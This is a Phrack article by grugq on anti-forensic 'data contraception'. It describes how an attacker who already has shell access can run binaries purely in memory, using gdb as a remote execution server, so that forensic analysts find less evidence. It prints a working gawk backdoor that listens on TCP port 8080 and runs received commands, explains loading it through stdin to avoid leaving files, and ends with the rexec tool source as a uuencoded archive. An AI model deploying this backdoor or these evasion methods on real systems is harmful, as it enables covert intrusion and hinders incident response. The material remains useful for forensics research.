File: archives/62/p62_0x08_Remote Exec_by_grugq.txt ==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x08 of 0x10 |=-----=[ FIST! FIST! FIST! Its all in the wrist: Remote Exec ]=---------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ by grugq ]=------------------------------=| 1 - Abtract 2 - Introduction 3 - Principles 4 - Background 5 - Requirements 6 - Design and Implementation 6.1 - gdbprpc 6.2 - ul_exec 7 - Conclusion 8 - Greets 9 - Bibliography 10 - SourceC0de ---[ 1 - Abstract The infrastructue of anti-forensics is built on the three strategies of data destruction, data hiding and data contraception. The principles of data contracteption, and a technique for executing a data contraception attack are presented. This technique provides the ability to execute a binary on a remote system without creating a file on the disk. ---[ 2 - Introduction In the years since the introduction of the first two strategies of anti-forensics [grugq 2002], there has been little additional public research on anti-forensics. This paper introduces and discusses a third core anti-forensics strategy: data contraception. Like the other anti-forensic strategies, data destruction and data hiding, data contraception seeks to reduce the quantity and quality of forensic evidence. Data contraception achieves this by using two core principles: preventing data from reaching the disk, and using common utilities, rather than custom tools, wherever possible. The rest of this paper will explore data contraception, looking first at the core principles of data contaception, then at the requirements for a data contraception tool, and finally the design and implemenation of such a tool: rexec (remote exec). --[ 3 - Principles Data contraception is the attempt to limit the quantity and quality of forensic evidence by keeping forensically valuable, or useful, data off the disk. To accomplish this there are two core techniques for interacting with the operating system: firstly, operate purely in memory, and secondly use common utilities rather than custom crafted tools. The first principle of data contraception, keeping data off the disk, is most important when dealing with files that interact directly with the operating system such as binaries, LKMs and scripts. The second principle is for guidance when implementing the first principle, and it ensures that any data which does touch the disk is of limited value to a forensic analyst. Operating in memory only is not a new technique and its already fairly well understood with regards to rootkit development. However, using in memory only techniques during a penetration is not as thoroughly documented in the literature. Within rootkit technologies, the most frequently encountered technique for operating in memory is to use ptrace() to attach to an existing process and inject code into it's address space. Additionaly, injecting kernel modules directly into the kernel is also a well known technique. This paper will focus on developing in memory systems for penetration tools. Implementing an in-memory-only system requires a program on the remote target host acting as a server to interact with the operating system. This server acts as either an Inter Userland Device (IUD) -- providing access to its own address space -- or an Intra Userland Device (IUD) -- providing access to another address space. In either case, this IUD is critical to the effective execution of a successful data contracteption attack. The second principle of data contraception is critical in reducing the effectiveness of a forensic examination. The use of common utilties means that nothing of value exists for an analyst to recover. An example would be a back door written using gawk. Since some version 3.x, GNU Awk has supported network programming. Why the GNU people added network support to a text processing tools is something of a mystery, however it is a useful feature for a data contraception attack. Here is a proof of concept backdoor developed in a few minutes using gawk. [------------------------------------------------------------------------] #!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } } [------------------------------------------------------------------------] To effectively use a script, such as the above, in an attack, the attacker would employ the first principle of anti-forensics. In practice, this means the attacker would launch the script interpretor and then copy the script itself to the interpretor's stdin. This prevents the script from appearing on the disk where it might be discovered during a forensic analysis. Using these two core principles of data contraception, the rest of this paper will examine some existing data contraception tools, along with the design and implementation of remote exec: rexec. ---[ 4 - Background There are already several projects which use a data contraception methodology, although the terminology for data contraception is more recent than their development. The projects that the author is aware of are: MOSDEF; Core Impact, and ftrans. The first two projects are commercial penetration testing tools, the last is an "anti-honeypot" tool. Core Impact implements a data contraception techinque called "syscall proxying". Core Impact uses an exploited process as an IUD (Intra), and a client which contains the attacker's "business logic". The IUD server executes system calls for the client and returns the result. This allows the attacker's code to run locally on the client system, and yet behave as if it were local to the remote system. According to Dave Aitel, there are problems with technique, mostly related to execution speed and complexities involving fork(). As a solution to the problems he experienced implementing the Core Impact syscall proxying technique, Dave Aitel developed MOSDEF. MOSDEF uses an exploited process as an IUD (Intra), and a client which contains a compiler. This allows a penetration tester to build an arbitrary program on the client and inject it into the address space under the control of the IUD for execution. In this technique, the attacker's code runs on the remote host, however it exists only in memory. The problems with this technique are limitations in the size and complexity of the attacker's code, and all of the issues related to implementing a compiler. Unrelated to the previous two penetration testing programs, ftrans is a pure anti-forensics tool designed to operate in the extremely hostile forensic environment of a honey pot. The ftrans program uses a custom built server which uses SSL to copy a binary from the client into it's own address space. It then uses ul_exec() [grugq 2004] to execute the binary from a memory buffer. This technique is most similar to what this paper will discuss, the design and implementation of rexec. ---[ 5 - Requirements With data contraception, any action which requires the creation of a file is to be avoided. The most common reason for requiring a file is to execute a binary. Building a tool which can execute an arbitrary binary on a remote host leaves open any number of possible implementations. The requirements need to be narrowed down to a manageable set using the principles of data contracteption. From those requirements it is then possible to develop a design and implementation. Firstly, the tool has to be able to run over any number of shell connections, so the communications protocol between the client and server should be ASCII text based. Using ASCII text will mean a slow protocol, however robustness and effectiveness, rather than speed, are critical to the performance of the tool in the real world. Secondly, the IUD server has to be a common Unix utility rather than a custom crafted tool. That way, the discovery of the server does not indicate that the compromised machine has been subjected to a data contracteption attack. Using a common utility rather than writing a custom tool means that the IUD server will not be intellegent in how it operates. Based on the preceeding requirements, its clear that the client has to be complex to compensate for the dumb server. This is acceptable because the user of a data contraception tool will have complete control over at least one machine. ---[ 6 - Design and Implementation The core design for a data contraception tool to execute binaries on a remote system purely from memory is: *) use an IUD to gain access to an address space *) upload the binary to execute into memory *) load the binary into an address space *) transfer control of execution to the binary A library to load ELF binaries from memory into an existing address space already exists: ul_exec. Using ul_exec allows the tool to simply upload a copy of ul_exec and the binary, then transfer control to ul_exec(). Therefore, in order to implement the data contraception tool, all that is required is a suitable IUD. A suitable IUD would have to be a common Unix utility which can manipulate registers and memory and accepts commands as text. There is one obvious solution: gdb. The GNU debugger uses text commands to interact with, and operate on, a slave child process. Using gdb as an IUD allows an attacker to be exploit agnost for anti-forensic attacks. After using an arbitrary exploit to gain access to a shell, an attacker is able to execute any binary without creating a forensic trace. By the same token, once an attacker has shell access to a host, he is able to execute an artibtrary command without leaving any evidence of forensic value. An IUD seperate from an exploited process allows an attacker to use anti-forensic attacks at any point after owning a box, rather than only during the initial exploitation phase. --[ 6.1 - gdbprpc To interface with gdb, a library was written which creates wrappers for the core functions of an IUD. These are memory and register access, and control over the execution of various regions of code. This library, gdbrpc, creates an arbitrary slave child process for an address space to manipulate. Each gdbrpc session is described by an abstract object: rgp_t. This object is created using rgp_init(), which takes a readable and writeable file descriptor to a pty based shell. The facilities to execute system calls and examine and set memory contents are encapsulated behind standardised function calls. For example: int rgp_brk(rgp_t *rp, void * end_data_segment); void rgp_set_addr32(rgp_t *rp, void *addr, unsigned int val); unsigned int rgp_get_addr32(rgp_t *rp, void *addr); void rgp_set_reg(rgp_t *rp, rgp_reg reg, unsigned int val); Copying data into and out of a slave process is accomplished using the functions: void rgp_copy_to(rgp_t *rp, void *remote, void *local, size_t n); void rgp_copy_from(rgp_t *rp, void *local, void *remote, size_t n); With the gdbrpc API set, it is trivial to allocate memory in a process, copy in arbitrary quantities of code and data, and transfer control of execution. --[ 6.2 - ul_exec In order for the ul_exec library to be correctly loaded into the address space it needs to be relocated to the load address. This is done internally within rexec. First, rexec allocates the space for the library in the remote address space with rpg_mmap(). The address of that space is then used to relocate an internally loaded copy of the ul_exec library, and the resultant relocated library is then loaded remotely. With the ul_exec library loaded in an address space, all that is required is creating a memory buffer containing the desired ELF binary. This is trivially accomplished using rgp_mmap() and rgp_copy_to(). Finally, putting it all together it is possible to encapsulate the entire process into a single call: int rx_execve(int fd, char *fname, int argc, char **argv); --[ 7 - Conclusion Along with the other two anti-forensic strategies, data destruction and data hiding, data contraception helps an attacker reduce the effectiveness of a forensic analysis. Data contraception attack techniques have been used frequently in the past, although without the articulation of the formalised core principlies. These two principles, operating in memory to keep data off the disk, and using common utilities rather than incriminating custom crafted tools, form the core of the data contraception strategy. A frequent component of data contraception attacks is an IUD, which acts as a server providing the client access to the operating system without altering the file system. A tool which implements a data contraception attack, remote exec, uses gdb as an IUD providing access to a slave process' address space. Accessing rexec requires a complex client which can gain access to a pty based shell. A tool to encapsulate the rexec protocol has been developed: xsh. The "eXploit SHell" is embedded within screen and provides a rich data contraception environment for penetration time anti forensic attacks. --[ 8 - Greets gera, mammon, grendel PhD, xvr, a_p, _dose, "the old man", apach3, random, joey, mikasoft, eugene. --[ 9 - Bibliography - grugq 2002 - The Art of Defiling: Defeating Forensic Analysis on Unix http://www.phrack.org/phrack/59/p59-0x06.txt - grugq 2004 - The Design and Implementation of ul_exec http://www.hcunix.net/papers/grugq_ul_exec.txt --[ 10 - SourceC0de begin 600 rexec-0.8.5.tar.gz M'XL(`'6RYT```^P\85/;2++[U?H5'8[-R6`;&QOR*@[L$>)VONV=&,Y)E2-X+I&X?JE2P6CT]/3W=/=TS+27>E>=N M?7>G5[O=:S_9V<&_?)7_\N].N_VD\V1[I]?M?-?NM'=W=[^#G;ME2UR+-',2 M@.^2*,INPKOM^7_HE?#\I\E=ZL`7S7_O"YC_^[CT_+]VWGL3/_"^ M?A]HS^W=7F_5_'?:.[MJ_GN=[2[B=SN=SG?0_OJL+%__S^?_[.U);:_6:EG6 MX2'^F+JN=?CVY.P=_F[^Y`0!-'_RDB1*H#F=CD?6B\%+?&0=O3D\_O'%@)". M6M`\6K>13GW+#]U@,?8T`)LDL:O@UN'+XX._$^EUFSNIP[HM2=%/(EZWK(-3 MQ,`Y22SKW2DQ]:L%?-5J3N"G6HTRW7LMX^_T=% M\\AH'IG-([-Y9%G'1\^Q>>"/!,2Q7@T.7@Q.!6P1,'!F62BEI\B]>$CCP'8X M#/&7GB`;=0O'?)`_54"KA1T1"@Z440X/Z9F04QV:+C0C6/\;K#\C>K*'IX#= M;\]:ZG@)_]_>[N$_Q-]^TGWRX/_O MX_J+\MG/TFSL1ZW9OE4`H?,HPQ(_G!9A$S?,@B)H$:)O&9>:7J=;\[D3$M0` M>\&DB,>>N0`1NEEL)M86`1QCY!)ZM8/CH[^_L=\WX+)>LVW[?7W3MB_1C7;J M]<=_T$_ZE6._.SL]?'UB.PTX;<`(6^#0W'E,@%$=3J&-'A)!"S>#9)A&P\1+ MH^`2?K=J@V#2W1Z^NY[7-B"]GF?.J*^`/T7)&*$S)YV58>[,\<,B$"`<+=SW M7I8NP1F;P/@CJ5%'6<(=?>H7V")^+B.?.A@YJ8<-2'S#C.YC\XYBN[R7P6R< M(,S#/SGL1,!BA*D_#;TQ M06$CBAN00X(HG#+##1`]G7H!;"3J#F4+&RC:NH7#P]:X*&>P!^V^,=GCL1>. M:S;2U7/Z'"G6;**K82>!XR(P:>XGPV@R2;W,T`&<0QO[:>ZGV?#2"1;8#D?Z MP<_<&=B#XY?$V?#LEY.!:.^'DZA>)YF[V`><#KO_M3M\\_;-X"D&#A@G.._[ MA4?=;7J`+"+S-*9-$&SWJ]%/#E M"D?N+(*,,+U0V."X6,I!9)"#;^K:,*%31(\N(-4S>T%\,E M92'UA8W\]AW?IK,AJFX1AH2&Z8RU2(.%U2*\`6Q60\-6FF:`RLFZ'D@H MVZ1H*P"DH@`^JB=J#]-&,3T6')V#X`)U;#8,_/`]7/1)]%K@*1`899Q%U'7* MLA:,F60$X3(9;F"T9__,)'(MGWH94;#1TS8`1D<:P42<8*O0FV`1GVLI& MQ$BP'?)@&V99AYQ>0_)4%^Y!(1-IPN/+1.8A$;(4I:;,YE^@+*>NK[1+/4.^ M)IB/V#[[`_#AF2G?U/^W!UM`?Z*)IEU'Q,U--MR:Z95P$B/RDL5YUH!<'0BD M/''HS-&BR!IH=N10SOT+PD%4GC(AN7/E0=[]\MIP((Q)5!A5R.U<>2&",P*; M<0]I!Y0;`$;5A`Y8USX[60:DR(DJ`A: M*6Y2`!55T/S'8N63X0KQ3Q)"D=0V-N!`C5A(PL=E:.;AV.81PN(D MD1KBK!(K&$[&-C+3;I`VD-4WX.3T[1FOR0UX?7`R/#D]^N?!V>`C_3Y`<`.7 MKP;0=/"D"F)[C/KRX.AX\$)X"?2L/__\,XC-CVB1M?(%D*?SS8_'Q\)^K()N MV&0B=L%&ZM1%/:P^F481H?I8%'HRBZQ0<7+6G?A*(58`7"AKH M(I1#9;DU0(T7/=O&%B)AP#V/`V_NA>9BO<3KEE0%DJT;81Q-FD!WB=<20Z3> M"&681:7N<+[-?@4UTB!#=8`H,9T;;3O6#T]RNRX9=EU9=BPMNT;Z0RXS/I=P M-..+W.+[$*.!LXY!K)R]U#5*\C+VS\CZD-;JP*.85B[/SVX`4;MQN%F1\NA/=GFL9RQYJT*5M?\MUC^$/<.@'J`\9PF']0 MK]@YA6B,IL"<#'/:'ZIX.#%ZOP M?ZK`_^GTZ&RPJL'/%0T&/P\.Q?I'BHFFF7ENQKK"(FF0;!M"IL4E1EA\<8UA MQR+2"9M3"_(N:<0N977&L9R>"#-$.R1YN>PF;;1S&0A@()C6T0;1T-D:0)L' M!;-2@Y`0^94T:NX332*,OW!UGO)OI5,J/="/!9SC\1=G0TPLSPZ>/Q6+;4J+ M>E(,C+@'O7Q).HNP-1[&&47"MB?[RNDB4\\YR:&97=\$+4ZW43[VZHU<' M[UYQ-[]SJT(*&_.TUTSSI2>W=5S=LQB'2H"1X@9:K?E$I,#+#RBY1FAL@!A5 M1&,2@:)NDSR'5*2+QI"-5$@#/VFG_LB>A,*,$D\CS20QU>. ML]`*2#1"08425T=>A<7#POA\2#W8Z'O23#\4XJ9@D4VET*@V$\'/E*;KPPP3 M?[`%*K-)3^T9/'L&/?*Q_(0$+%V`/<7G,S3_]M5$;M5Q:$/!_`S^>P^FL+\/ MV[T^DWJ\!W],"U8^X\$H6Q8_(G3+<@2"<1H6^7CB7:"2::?14MR@+3N-JBQ; M-#9M6\N>;LWVI)A(PZ/`A?R.K;@P'(.>1W1"_3(M/8^T=;*TPIG*WY>(<<%, MY6JWPEP@)VVN>]([Q&7D97%K3]GA->_'+FX/71X3[.)CA698_M:Q:I>YLPXEZ<0A43KKIAZ-XA2;\FU"_.B&R5A&8_)7@C. M\[0(>:84F+JBQ=++"(1QW%6[;7AY)$B39DP@\L*I#/4O*&E.&I"'LP6FA&UK M1LHA/3\A=[D'>5R,JY_)HQ:'1/T!VO"4%QO.`C!?B!;!&$8>4#3(@VS`!XZ> M,`GXUP(MA6)*9\RA&HF"4WH9CO,@*"%&9U0J1\F%*KPO)-TC=23-5P1HJ5^S&[Y,+JPC%]#XJT=MJ4^V,G;6D`R#EY M)ER8:0P@;G4K7@/.&7PA['A5#L]W>18O4G9-1_KW32$I?BYS=0-'K`F;8&;M MN0>5.\L$:Z"Y-51WQ01<3&79%9"N:+)B2Y+]SE\PL/4G+)".55LQ/')>6E1M M(:1GIFCEOC(]4/%,E5#41D99+%*^?8GR!8+Y#,D41*,D8PAFOWYX-AN]>'9P.7@S?/O_'X!!3`3[V'ZI]Y!N1 M:ITO/-,SSN\H+"$FS&,M8:5]'4A"=2`Y8??1EZ8.JTU]&>6FM;-/40/<&C5( MHBL"'5J_V#4!+O@W"8^6]F\S_Z;]<]7,'?1QR_E_I_NDFY__;Q,<[;_3?;#_ M^[BT/;IDA4OG_TXR78)]69E`J0"`>DF_I"Y`0]9$_=9LS0`)OV)"Y#I6!'&I MUEIU^8#&,\JZUFZK*B@5%5C>5>9A%"%!_O&=%WNYB(]>/P8 MB"[?Z%Q6T,'4$\DV&$%NK\N^.?WS8K'-5,S?10(O0,2>2@^ON%XN\&P2^F2L MU@(/#&F0.IBU5X8D^+=F$F^&\.#^!QJV#E:IF\G\:J=-A8M M[[.9YD/GH4)8J=A6,388.&^OZJ[86Z%N`?NH+ZE028-B)YL9VO0UE2GEO>*R M,BTI1JX7B$_;ILA0G]N"`%3H!8N^2C.PQ8I39*2"H0Y2N0]-H3%\%4WYIJIR M6?8V$Y$7Y\IR>7ZA[G!!B<\OOEAQ2LI1JQ:G6'.<4!(QV!\625SKHKCJYIHYX/S/+#NX_Y*5M# MG)^HH^M?7K_]\=U'XU#[]K/LY=5UQ?DN\4Y,&^*H.J[[W\0CEZ8D\A!C`V21 M.C+/FY,@PY%1E&41[6;EYP*(R/O*NEA@$?/6Z.#X)1$390&2LMJ4Y2E"3@1' M\O1:W<@3;)9:WFZE%LM.N4LZGL>`"CG@C5E=4I&BG5*-QNA?GIL)CEC[!?,T MZ7G^FC>ZU79T`BK(8.X9UU=SB%FM$"(7C#"(SN>15X8R5WQJO]W:I1I52*,Y M;4"'T;5/X>#,SW!Y@BG.@(//D@S\C&HO8B\)KF55FIXB\B$ZM"1-OG)E;M>@ MG>%P6M%OU?, MZI6PUN3SM1L%G;/D"Y9D(Y,;D@K-_`?OKXD'XRCT6E*81NHO>JVJ^C&B<>O_ M'(VKDEAR9ESPXBL+0IDJ>XZSA(4^E/6`['Q$`Q16KT\[$A/G/178Y+;NI:+F M1.%M*D1I9M4/$>!6/G@L5K#SBW([,1R:*S>4:PB5(HDS'!F"*-*7U9W23()2 M9D8SZAZ-R*7025WMCANE@Q5HHE20LPG=+9)'[VA0#1=S1D?Q<_UD1]7#2#[. M!8]+@^])/#[A$64A5,L%DVB1P.@ZHRJ@18AY]W6AY1Z']8((=.M46=+E"KJ4 M%M>8`[E6$G:#85LEO2LT@U%C&#=[0IJ5V//&8\\ M3Q3L(%_&F(FPJ4NW$5/'LP5*M9P4:=YGT:G2A67NA!"%UK8O/HLP4X!>F9AA M=W)R-JF\J4KO47&6E9\4B@]8BB91*FV4L81IY#>KM"A>R>,3^%RM5C9V[E_( M@E597W:;V-79L+0+-[ZVJ75#&DE=DS$#$D5#.+)JWG2L(D(JE+PLZ)+S4!9= M(>]/XS_[L1=]W'+^T]UMZ_=_=^D]\<[VSN[#_N^]7%^\L?NY M[WI5O"9&^[P4"2U#;]D4OFE/6&T`?^%VK8S(5-IBS?-D6*7DTE'RPD@A5S'+ M+M2-RCNJA.SGNWF<8R\7(F).>N/FI\I.0/BPOH!,J.YU,B8$Z@7VRMFB*N)4 M%:-&DLCKABK@E,2>01M^@$)>"4_Y]:J:JO#9`\Y0B2]=]=O@0>/E@FH1(XL6G.)S1CXJ;,R8158",HK-`)JKBN9&AE^J0><2%;-FAP94[EB6 M4E=5-!L\63D%5!VE*+IBA3B% MV+/E2G;LA6.^BM(^WE"@TO59L89/1%QMM1DKPO:\D(]K^/(V&.K`A5'%_OE% MZ=3+YJVEY2OGB;:3*+*Z]7CFB]B76S^\+2,VE6HU%`M+6;R]E)=.?>8H%26C MJ%I7)GZU"GSF,N57'ADN[RIH,E=(@D+IUNN?YGI[?S$/_=QZ7J?UX___'E\)4N]9'W5-53JLXA/3%?.A?O MZBFG*6,6O?Y\DC%67WMNJ/;%>NF0>6F%5(26;%B]XVJ'#G.;U>`\XTO M;?_RVSIWT,<3.KV.IVG=&Y#)YQJH\L&&[+K>[F/@W0..L4`(K3=CAP$#N/ MB2>&H4E<-DP"R]N$>=3TB%ZJ,BI@9(,F=[!T6L\12,WH1D=1O'-GQH=J9SD9 M+V*;ZT)N.$@Q2)X;@MC[E4_(^9\+LS,P%0@(H,(%_;I3LP5VFC>I%7:5%'_SFKKHS9 M5SO[`L*-3M;LM,K[]:5W*Q\N57FW0@V_$LJ?)UU(S,]$\HP_[O[]C-=M[[_U^Z0 M_7?;.SOMSBY]_WF[^_#]Y_NY]%>?U;>9Y6>?<<5W0K+;YE'^66?Z!#309Y$9 M[[@EO^\,]!.7$&@&K$[X5ST(%ID?R$\DXP(CP;IHDO$K/GP<0>:AMY@[?MAR MQ7>(Z=/0.8FG5NUO[A@D/4P9YE2OA-TPCB`N<52)8`$I,1"(\\)#\3'DRA[R M+R97TRX]-BD;C\0WEFF`5NU;^Q)A_TZ",QUXK>SJ+G3\9OOO;N^(]W_I_;]. MIRW6_^Z#_=_+!:7K)0:XCPK_'V4I?R54?I#M0X**_-0JMRM?I^*[;0/^_%SI MJI4!HVN8)HOI;Y;5;#;/X6"$B8;C9I9U-J/U?)(X(O-8>%0&3&ZIB`5I MR\FX2)L^L1HG7LK?;*/^<"R:3IQ$ESXRS:-R1G[@9]?TA4]!&T$61FY4)\KU MH_)#>>EUFGESWF_!M`AP>W_L&$LT!P29^@BXZ^Q"5A%V:GW.>6MC&!/^B(;XTQZ7G(\\+U8?O,#/T MB;030+P8!;YKD52NS>T<21[P\^_S*?H)78L82'NV(%U MSL&`8Y[C&%[`N:SCAQVD`6:1--H9B9#_[6[^JZIZ>BP`GCK/GK.;LB<5, M7ZJKJZNKJJNKS$X%8!-V+N+HBLD$2^'6C#-,..:%!Y]3\$9`Q'85#9@@&-"S M-.E#M*8F4$4I0TA:FI&;'@;;.,T0ADT(`%Y&%T@;0-R36A@E22_3Z#4()SA, MLBP^I?U$5G"*K9R)QLW;=4P<);H9]@!A=1;@`)] M-Z]*)0DK(PT?^?=QG')41#5)!M7>&/Z6WNP@&NQ)>$2:6ASOX[4-K1A:^L\0 MLC,,4'%#A!A<'N(5R%<'>'&]-P<.UB"HF;I8U_:(ENQP!*KHQ?UX=!=1!(X4 M+5%@RB^C:,C8TH\\!@1)"6D66H;&/*2%%X$)HE^,T(MAH M,Y&PHX+V+"+$='N@W2@HDYQ2G/$IKI.&9R,.>$R4IV0FI.+(HT`='F597/F8 M4+*/LZ"?4!LTW4DZ(OR#I`=$"(1]'2>S42"(",SB@&JG48>&*26`V3(FE&!H M?8)E\SIZ\U_?"M/*.FD\'&6RWP@F\E$$L>#[?!R3/(X(L8#(A?JTR[8T=L$J M41)1PSA5>(F5W:\**0%0D,B MG.^[,;K9)&Z-R?"4@0)J#,W^*<`+>*KB.2N1'AF4:`6*B, MPS0Z#].N,$H2O"YI*%UB+;UDB%&WS>OD&IRFI5S*`1`P`!ZM=L>I;'_#:!"! M>>NZ8P"!ER1-QN<75*F;=,8:/55$'=(D,+\C0F#;?$]0T6L+#/>0]!+9"8`^ M)IPS\!MJ@YJCI9F,02!1-RC*!DD-WF(>*E$_CLF(5AM-1CO$A`O^-0BB&Q*\ M4$MCX0H^![AM)I%`=\<@ M:4?$W`Z&I`5B3%D&(L!4FT'&>AGTKV@@7#DBHQV6X"\R*LJD0I;,H MY8"W2;YZ[:*ML"\96J!5J&B&-J*8N1&!MH<6S#OZWL-<[!!'I@7:V'NW0QKL MO,IOW'.')XRG)PL(?<490N'$MIB&']4BK4<)WU^:%X)IH1O:.$R-Y"OD>:G_5`N$W;YQ$+ MR7R1DMI`$&2STKYIF6_>OC-;UY>0=8,\BP(1_'627EJJ[<.7PGQ_(1('J@RC M9"@2L5=:Z_-\$^^Y&5DFP*C#R@%B`8,; M#TZM_.)/"^,L93,V.C'S9X'[]G+WF[VWYK\K*N@!L$G/"_W[^>+SQ6HADHY) M+'.%9D\ONU_#4ETN>$0<`@OUA9E=B&G.%D:=X<*L=#*[L+BP.%NIHE%9EYHU MP-FGF]SQT3[B'V!A_?E+"\R]%2W05(4X)2SFIM/OWEL-A_54[BZXRX^.%=6\ MWIKF:WB=/[01^_!XS:/%CQFJ?<3/'-#?6^67B25^L>/!SU8)(6T`2]&WO`G5BPM]H)%V:()=C`Y4 M-4Z+ZH!8ZA0>WOR9SL80[WGGNL8(0*9IM!%\NW^TL_MJTVRC99(WB4Q5^^=H M`])<;MUR#:,-R!M1VHG#7E%ZC61J=!XX,D28R7X[,+.\.BZ2070[3$:S7*IM M@L`#()^@K'XSAL`=#Z!#0+LG6IPE(14_`X+O!N$;9MO^B#`AW#E;65B=C&A;%1!_'5_R=+:FCW%AHYVH/YT9@5=:$T$914B MJ7.5U0&D2%ULPY$^T*'X;F5V!8Q[(UVR\(.\+O(*ZIB5'$AKXX%D.NG=6J%? M&Y4.932W$1;O17A%;60![5JTI*]!RY(D1=E&P6I*\E^'%FU7)M+LH.X68:YG MS99$`,#V:0\*C*PRJP:U6`$DB-((>5VZN:&6K7[#*)+0(6QGP8Y!PBKI8E=) M[TH--Y<-6(VV6$E)>F-=U@REZQ/"^@UQAQB&GV[5#.#-?Z#D82QY^+#F0_,$ M-UD6;?W7TD_PDDZ.%22*&:SY7=Z,TM.8/B,WC4C+ M07&Z/04X'N5J:U&W8LN"ICN1\"%BO@X`OV>JAU[!QF_?!M\J$S_3(!%@II07 M*`%!SRP(VJIKB#W$*K^.4?D4!);O&4E`H3"_:&(P/77A&Z$%^KFU9O@)\R3.5X` M*U_9Z@ZFIS95:=^:!'6(I-7`4$OX`C()(,_4*=$4`;*H-LQ*#?%2Y=72M;4$ M".5:4R$?#EDEWNU5F3DZ>@,H6*P(C1ZEL&#@D5AN4X'1HZQCCT0RX>;T*+C1 M]`X\5C_XYS5H5KH)1/ZP)I'3,0EJ:>7\A_>^##>0^W$OY*5Q+5N;M;<$+"3H MH4=KDM':W_*]7?[0,XT'`>Q;M>()C(:AG&\(\ISIA='$YTO67@#;:""F+,2U MA[N>G&NI>4R5=:J3T3]8?-*8=T`EM15E@9V7MGD)IB#EF)"4Q_#^IL=A/L.H MGHP%;`KJ12&.2G`-ED3A^TSG2EK"GB4VK:)`G/=@ZVM[;$U,&YS9K&Q&?O?=,W-`:L"/2CN$Z M:066T1(GI44^L-;0@@&I53@WX!VX)2)<;OYB$8,6$I%BGZWKRC,92RX#&16] M3M)>EW!YI`<5@LQ/<4`G='BO@ZU;:MU.#ZO M';'5?I"0_C/HQIPOSL(S]G[Y&9"$WA M(*8X!!C"M!`/A4_"1,7+X?'0PW,)F_NIJ&HDP9X+?^4,>$3?NAN0(O72YKK3 M#:A#,X>^_!71XI,$^-.DWOB%WMQ4!+I9"IOOTYK/@"\KB7:)S!4^Y;W8NSK@ M?+PL3J-."*T&VSS]FPJ/FZ!\R0A9W)1>1Y[`P0N+F4\V(ADFLK-C6?%.OGKW M"JM73*NL2.H*GVBL8R"\W<8>-#$/#(K>`7H(Q[N0.X#8R.U:+0)2U1)NP!Q=NIGM1X=XV[)YO5XSU!E/YUC$29&4%5[ZUR,'* MDQR-KLK`1X">85=&B2,B*V:T136'C,3&&]);]%S#4I`0^<33;B)7.<7,`EU9 M73'R9N-8%@!-/C22P@NUV3"AW\7O\OV9&&L\Y&27U,]Y#"E?N+7BG,557G49 MMT1_LXJ!/8`W7S$^8]DDIRR,!E8_VH![GFS0,)UWH]/Q^7F4BD#&>XAKL'S@ MPV)R8$50%G1HD^'E>P'U0W4=9]:!YV.N]U@-9I#;L@09JBR9\'S`YX%)V8%$ MRI-4L74V8DCUF"L776P3-@74Z:;>"X).0&HZ@>42]5,$B19J54- M?MBCY!*12&'<+W3"H2+1=P$:57JB>A@,G`I/94PZ#0X%B-?@'.P::A@G?%.&Y(`D.QD"2.9.;HO#`6IS: M_L382+M?V+-@B`0\)"1%ZO=!U#),AQVVPC+9G7%R5\C8]`FT9EG2-6'6GBKI MFL%417@+`V7J+"?BRG0V'H@D)D977J-8`)FHCMZ:LHM-IZREZB-SDL!F_32% M$[\KXHA0]E!5NX!*J;NC@MQ2G]A68"$MD&_-(G(G;@7%G*2OG#40WG9QU*WN MMEG$V41!6+3ODLN-J'.@!EK=D&0<"J(&7^5#QHCU6%E@+OAPLZ58 M'H67K"2"H3/M,GG21(CDSIJ,=#V$%9IEIB'Q-4G$RVM!=<^P8_U4//(OF+[` M::PE5X1AEW07\R$V/YH\6@7A,!N+`GX:D83018`?!(/L0J@+[.1+NZ0NL/F" MSRN]W9O3!M"`3]/+:HQBZJ1[@DWA)(O.L4LT-UU%2652"NI7;D`"FQ2R4DO( M9-M*X1.JG]_3VB0(B`K]"OA)KT"VV)LH[5 MJ\MEZV#/<(09U1/3^"H6&Z=+(^T$'#G%98X@4DCLKU[U.A-/3K%V6:]&82`U MDE?N-:#<3V44=B85L<2*W%;<\02R4Y9OU?4$TI%,:L&4%VA*Z!$GQ[:*EDVY M[(Q5(EM)E5RBQ]T>8<+LVA=/2&ZL'+?4A<]B2\^*N%,+N@4Y+MC]BBQ- M7)>&YQ+;NRD,PA9A-8ZV'1V+J/-0++KB@J`3Q2XO%EB+$"LNUN"P967'0$SH MX6#D8<9!K=8#;4^@[]VV/5HJSXV;BPKK+@B/5BWK.JXK>F'!MF6-P<[+E)09 MR)M.$+]U\Q4H]?9NZQ:H"YS>E#W.6Y)--G4PVEJDX8S$PVHDL";$A"Z<"X1O M0_&8KFR(1/]BYA<^P7P$GM#G/3EZ*7/:NV/YLWB1GG?L:Y=0!0ME.\'-FHP5 MO:W"T9TX'[/5]>,=:UB4DSQ/Y((!)2AZX+B3SEHG9'%H]QSO M6$-@R\.8MZ[<,T[M*L,P&WD'@E8TY&6/ZRB8$M_;'"::'F^#A8-5PH05@.2P MSAK96K6.=C2;<``5^T?1^W.RTW-!&*3VTUA\D5!4S!\%?]06`ZLFF=09E6HF MPWJBDZ3K?`?9:D$\2VS=$]UR,CU;)`'0RC360\UZN06YOYAOCG,2?)W/FYL' MFI@H=7LB3+-Z2`:-T#/!WG=N:3T*O./FEBAHM'D%N4I5YRU7VK2?5!P;.]8' M2NZ1>5Z!UO13/)*BOLHZ556JD^$%-;Q!=@EGZW2V-7>&MF%NL@MA^[/1#ZP< M!$>OJ=59S%;4)S$6/%6W()(NHTC,/NZN!TFD[)M;/4?W#T&P*15.8^*^*#JF MHF@*I_F&>H*9G[1CVLC[(>B;!'DJVXUZYN"":.CF"M&63T@*.>DFDGL-<9IS/#B MEMZ8_`Z(F6?T;*5,WCNX=DH3N(%?NG>\LD/84HYCU+A`?/=B-!IN+"Q<7U^W MAQKX@/Q?6OEH8KGTUOWBSN(Z;;(5^5[7?B:8VWQI3[.BB,Z;.V_#K MXE.7;(%;/;'6'^XJ^*,O\OW*1^[_B1RY\#OU0=B_\_X_?NO]_[65Q6>X_[N$ M^W]KOQ,\A>??_/Y?8?X1!N)WZ..CYG]-XK\L+T_G_W,\E?F'[)-]VC"`]]S_ 